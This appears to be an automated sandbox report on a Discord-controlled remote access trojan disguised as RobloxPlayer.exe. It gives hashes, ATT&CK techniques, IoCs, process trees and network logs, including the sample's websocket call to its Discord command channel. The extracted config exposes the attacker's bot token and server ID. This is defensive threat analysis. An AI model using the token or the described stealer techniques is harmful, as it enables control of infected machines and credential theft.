discordrat | d0edb846b44e046fee8fea55dba1160e988ccfc947cf51fbb2803ded90268d19

Analysis

max time kernel
152s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
26/05/2024, 02:04 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RobloxPlayer.exe
Size

78KB
MD5

8f3d0d4044ff8cc1d847687568c91e14
SHA1

fd9049e0e5c074603b78a2aea228b75e4ce6c099
SHA256

1c7ffa12df8fc6b0617ddd3e7bf89582154156c803ca2b2df7a6073d43e13dc0
SHA512

afd8aa0948e588de2bb7d44687afccd5da52e613a06a26bbec862945a3cd1a80423b2e1929256bce23e92bac5b09f27e436c1223583d4507c6782da3d46760e4
SSDEEP

1536:52WjO8XeEXFh5P7v88wbjNrfxCXhRoKV6+V+cPIC:5Zv5PDwbjNrmAE+QIC

Score

10^/10

discordrat persistence rat rootkit spyware stealer

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
server_id
1201970766531530822

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat
Downloads MZ/PE file
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 33 IoCs

Web Service

T1102

flow	ioc
199	raw.githubusercontent.com
448	discord.com
776	discord.com
119	discord.com
327	discord.com
741	discord.com
50	discord.com
148	discord.com
200	raw.githubusercontent.com
539	discord.com
768	raw.githubusercontent.com
147	discord.com
775	discord.com
810	discord.com
760	discord.com
85	discord.com
230	discord.com
346	discord.com
809	discord.com
79	discord.com
125	discord.com
248	discord.com
427	discord.com
774	discord.com
811	discord.com
61	discord.com
449	discord.com
740	discord.com
785	discord.com
49	discord.com
320	raw.githubusercontent.com
786	discord.com
236	discord.com

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	firefox.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	4492	RobloxPlayer.exe
Token: SeDebugPrivilege	5008	firefox.exe
Token: SeDebugPrivilege	5008	firefox.exe
Token: 33	4144	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4144	AUDIODG.EXE
Token: SeDebugPrivilege	5008	firefox.exe
Token: SeDebugPrivilege	5008	firefox.exe
Token: SeDebugPrivilege	5008	firefox.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
5008	firefox.exe
5008	firefox.exe
5008	firefox.exe
5008	firefox.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
5008	firefox.exe
5008	firefox.exe
5008	firefox.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5008	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5008 wrote to memory of 2688	5008	firefox.exe	93
PID 5008 wrote to memory of 2688	5008	firefox.exe	93
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 1228	5008	firefox.exe	94
PID 5008 wrote to memory of 2500	5008	firefox.exe	95
PID 5008 wrote to memory of 2500	5008	firefox.exe	95
PID 5008 wrote to memory of 2500	5008	firefox.exe	95
PID 5008 wrote to memory of 2500	5008	firefox.exe	95
PID 5008 wrote to memory of 2500	5008	firefox.exe	95
PID 5008 wrote to memory of 2500	5008	firefox.exe	95
PID 5008 wrote to memory of 2500	5008	firefox.exe	95
PID 5008 wrote to memory of 2500	5008	firefox.exe	95
PID 5008 wrote to memory of 2500	5008	firefox.exe	95
PID 5008 wrote to memory of 2500	5008	firefox.exe	95
PID 5008 wrote to memory of 2500	5008	firefox.exe	95
PID 5008 wrote to memory of 2500	5008	firefox.exe	95
PID 5008 wrote to memory of 2500	5008	firefox.exe	95
PID 5008 wrote to memory of 2500	5008	firefox.exe	95

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\RobloxPlayer.exe
"C:\Users\Admin\AppData\Local\Temp\RobloxPlayer.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4492

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5008
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.0.1405386525\949665800" -parentBuildID 20221007134813 -prefsHandle 1852 -prefMapHandle 1844 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {14675cc1-b707-40c2-9778-0891c1b9f743} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 1972 2bad8a08158 gpu
  2⤵
  PID:2688
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.1.799099091\1079540725" -parentBuildID 20221007134813 -prefsHandle 2316 -prefMapHandle 2312 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3b70ed00-fca2-42fa-b7b6-6b2a91b69e9f} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 2344 2bad7545858 socket
  2⤵
  PID:1228
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.2.1284863639\1121990144" -childID 1 -isForBrowser -prefsHandle 3104 -prefMapHandle 3100 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0da86e12-f474-40d7-b6a1-3eb07a2f37c6} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 3116 2badb995658 tab
  2⤵
  PID:2500
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.3.1856488554\1118102147" -childID 2 -isForBrowser -prefsHandle 3564 -prefMapHandle 3544 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f30ff155-dc61-43a2-8aa4-999084016227} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 2316 2bada1de858 tab
  2⤵
  PID:1240
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.4.2135807297\138680115" -childID 3 -isForBrowser -prefsHandle 3608 -prefMapHandle 3604 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d5b2264-4fb9-4d86-82f4-3131d6cefc10} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 3620 2bac3d5b258 tab
  2⤵
  PID:2608
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.5.1197804460\546944117" -childID 4 -isForBrowser -prefsHandle 5004 -prefMapHandle 4956 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {733358ad-01f6-41b8-ada1-f125472c0a4b} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 4964 2baddcd2858 tab
  2⤵
  PID:4292
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.6.574375922\314467356" -childID 5 -isForBrowser -prefsHandle 5016 -prefMapHandle 5012 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {669ff3ea-4263-46cc-89f6-7088aca1db1f} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 5028 2baddccf558 tab
  2⤵
  PID:1604
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.7.652936528\167008958" -childID 6 -isForBrowser -prefsHandle 5176 -prefMapHandle 5028 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {33e543dc-d16b-48fa-a271-c0566b82fd8f} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 5164 2baddcd0158 tab
  2⤵
  PID:4328
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.8.1792668156\1042064995" -childID 7 -isForBrowser -prefsHandle 5884 -prefMapHandle 5736 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {af224b6a-c1d0-4f68-a370-61dfbbdf4d6d} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 5892 2baddc62758 tab
  2⤵
  PID:3952
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.9.1182298143\548455456" -childID 8 -isForBrowser -prefsHandle 5416 -prefMapHandle 4968 -prefsLen 26646 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9e0f3f3-7a2a-46aa-a3b2-a209faf9df87} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 5296 2badb90c858 tab
  2⤵
  PID:5588
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.10.2104330775\1209583857" -childID 9 -isForBrowser -prefsHandle 5388 -prefMapHandle 5608 -prefsLen 26646 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ec225d6-ebb8-4bf2-8fd0-cc1fd7534946} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 3676 2bade820158 tab
  2⤵
  PID:5636
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.11.592402046\594021814" -childID 10 -isForBrowser -prefsHandle 4548 -prefMapHandle 5172 -prefsLen 26646 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6cccd998-f79a-4fa4-bd38-eb57bcda3c2b} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 5252 2bad91d3258 tab
  2⤵
  PID:3100
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.12.842866883\1948926298" -parentBuildID 20221007134813 -prefsHandle 3640 -prefMapHandle 4980 -prefsLen 26646 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {25c78588-6754-44ce-b5ae-6f9490d18e66} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 5092 2badfe47858 rdd
  2⤵
  PID:3592
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.13.1691606301\467324740" -childID 11 -isForBrowser -prefsHandle 6288 -prefMapHandle 6192 -prefsLen 26646 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48d0c833-abe0-474a-a26e-0dc1dc3ac9d7} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 6276 2badfedae58 tab
  2⤵
  PID:5688
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.14.671481484\326014630" -childID 12 -isForBrowser -prefsHandle 6036 -prefMapHandle 5888 -prefsLen 26646 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {53fb88a6-7105-47c4-9092-6890de3e5cf3} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 5028 2badf8bba58 tab
  2⤵
  PID:1056
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.15.575230555\749062158" -childID 13 -isForBrowser -prefsHandle 10444 -prefMapHandle 10448 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec2f84b9-76d3-4072-b226-578bf5729e6c} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 10436 2bade822858 tab
  2⤵
  PID:5292
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.16.986323902\459035742" -childID 14 -isForBrowser -prefsHandle 10156 -prefMapHandle 5644 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {63ff50c5-75b3-4a4a-8df7-c17589ad6a74} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 10144 2badf95f658 tab
  2⤵
  PID:5260
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.17.1001994635\812604781" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 10156 -prefMapHandle 5644 -prefsLen 26725 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {625256d7-3b6e-4ad2-973c-16bee874ebc1} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 10420 2badf89fd58 utility
  2⤵
  PID:1820
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.18.343130661\1080302595" -childID 15 -isForBrowser -prefsHandle 9844 -prefMapHandle 9828 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1f288a4c-ae71-47db-9988-45cab963c64e} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 9824 2bad7545b58 tab
  2⤵
  PID:4004
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.19.1059199574\330563122" -childID 16 -isForBrowser -prefsHandle 9624 -prefMapHandle 9596 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1ac2bdd3-cf38-4817-88d9-5cd199081d12} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 9632 2bac3d60158 tab
  2⤵
  PID:436
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.20.913112202\920942426" -childID 17 -isForBrowser -prefsHandle 9240 -prefMapHandle 9236 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e1c5ec22-40e6-4f06-a45a-190ffa23f4b4} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 9248 2bae0060558 tab
  2⤵
  PID:5572
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.21.1053123557\760449134" -childID 18 -isForBrowser -prefsHandle 8992 -prefMapHandle 8948 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {44bb62d8-0915-4e4a-8367-8a6678dd94a6} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 9060 2bae0849a58 tab
  2⤵
  PID:6404
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.22.1368414253\1964509878" -childID 19 -isForBrowser -prefsHandle 8992 -prefMapHandle 8948 -prefsLen 27204 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {360f819e-246e-413b-8da4-6e51e1a9fea0} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 8792 2bae1c7ee58 tab
  2⤵
  PID:6776
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.23.858815724\239018504" -childID 20 -isForBrowser -prefsHandle 5428 -prefMapHandle 5444 -prefsLen 27416 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {599597a0-1aeb-4dac-92be-4d4101080788} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 5508 2bae35b5358 tab
  2⤵
  PID:3276
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.24.828243925\1778771845" -childID 21 -isForBrowser -prefsHandle 8476 -prefMapHandle 8472 -prefsLen 27416 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a6c03eb-c53d-40f5-b292-27154e90f372} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 8484 2bae386f658 tab
  2⤵
  PID:6840
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.25.1448503874\1764489037" -childID 22 -isForBrowser -prefsHandle 8212 -prefMapHandle 8216 -prefsLen 27416 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aabe538e-bfbb-4945-8c30-6194f144b6f0} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 8300 2bae3870e58 tab
  2⤵
  PID:6860
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.26.2147475180\839766700" -childID 23 -isForBrowser -prefsHandle 8332 -prefMapHandle 8852 -prefsLen 27416 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0667c7d-78a0-4003-8491-8ce16fd4c899} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 8052 2bae1eadc58 tab
  2⤵
  PID:6640
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5008.27.1844734657\82987674" -childID 24 -isForBrowser -prefsHandle 10408 -prefMapHandle 8300 -prefsLen 27416 -prefMapSize 233444 -jsInitHandle 1416 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d30aa5cd-183b-46eb-9c25-04a417779441} 5008 "\\.\pipe\gecko-crash-server-pipe.5008" 8044 2badc7ba658 tab
  2⤵
  PID:1068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4480 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
1⤵
PID:5896

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4b8 0x4e4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4144

Network

DNS

gateway.discord.gg

RobloxPlayer.exe

Remote address:

8.8.8.8:53

Request

gateway.discord.gg

IN A

Response

gateway.discord.gg

IN A

162.159.135.234

gateway.discord.gg

IN A

162.159.130.234

gateway.discord.gg

IN A

162.159.134.234

gateway.discord.gg

IN A

162.159.136.234

gateway.discord.gg

IN A

162.159.133.234
GET

https://gateway.discord.gg/?v=9&encording=json

RobloxPlayer.exe

Remote address:

162.159.135.234:443

Request

GET /?v=9&encording=json HTTP/1.1
Connection: Upgrade,Keep-Alive
Upgrade: websocket
Sec-WebSocket-Key: 9gPJ5F/c8ln53kk35r7hIg==
Sec-WebSocket-Version: 13
Host: gateway.discord.gg

Response

HTTP/1.1 101 Switching Protocols

Date: Sun, 26 May 2024 02:05:10 GMT
Connection: upgrade
sec-websocket-accept: VnYbestHSXQA/sDoeQsdkLkBMMw=
upgrade: websocket
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WFRKbEuJ%2F6ZJ5j48P4M6wtfLg3vnpV4WIUY96AF%2B8V1nMs%2BmEkOyFNBmOHZUJGAl8Md3jM0h%2BadqdAFak57GDwKGF%2BNvlUlfKQmplP8KXOh%2F1Kq9ejalklxu9NuNHMVq3ZqRbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 889a32de3bb9731e-LHR
DNS

contile.services.mozilla.com

firefox.exe

Remote address:

8.8.8.8:53

Request

contile.services.mozilla.com

IN A

Response

contile.services.mozilla.com

IN A

34.117.188.166
DNS

content-signature-2.cdn.mozilla.net

firefox.exe

Remote address:

8.8.8.8:53

Request

content-signature-2.cdn.mozilla.net

IN A

Response

content-signature-2.cdn.mozilla.net

IN CNAME

content-signature-chains.prod.autograph.services.mozaws.net

content-signature-chains.prod.autograph.services.mozaws.net

IN CNAME

prod.content-signature-chains.prod.webservices.mozgcp.net

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

34.160.144.191
GET

https://contile.services.mozilla.com/v1/tiles

firefox.exe

Remote address:

34.117.188.166:443

Request

GET /v1/tiles HTTP/2.0
host: contile.services.mozilla.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers
DNS

shavar.services.mozilla.com

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.services.mozilla.com

IN A

Response

shavar.services.mozilla.com

IN CNAME

shavar.prod.mozaws.net

shavar.prod.mozaws.net

IN A

44.237.65.238

shavar.prod.mozaws.net

IN A

44.230.111.112

shavar.prod.mozaws.net

IN A

35.164.250.149
DNS

push.services.mozilla.com

firefox.exe

Remote address:

8.8.8.8:53

Request

push.services.mozilla.com

IN A

Response

push.services.mozilla.com

IN CNAME

autopush.prod.mozaws.net

autopush.prod.mozaws.net

IN A

34.107.243.93
DNS

contile.services.mozilla.com

firefox.exe

Remote address:

8.8.8.8:53

Request

contile.services.mozilla.com

IN A

Response

contile.services.mozilla.com

IN A

34.117.188.166
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

34.160.144.191
DNS

234.135.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.135.159.162.in-addr.arpa

IN PTR

Response
DNS

166.188.117.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

166.188.117.34.in-addr.arpa

IN PTR

Response

166.188.117.34.in-addr.arpa

IN PTR

16618811734bcgoogleusercontentcom
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:92a9::
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN A

Response

shavar.prod.mozaws.net

IN A

35.164.250.149

shavar.prod.mozaws.net

IN A

44.230.111.112

shavar.prod.mozaws.net

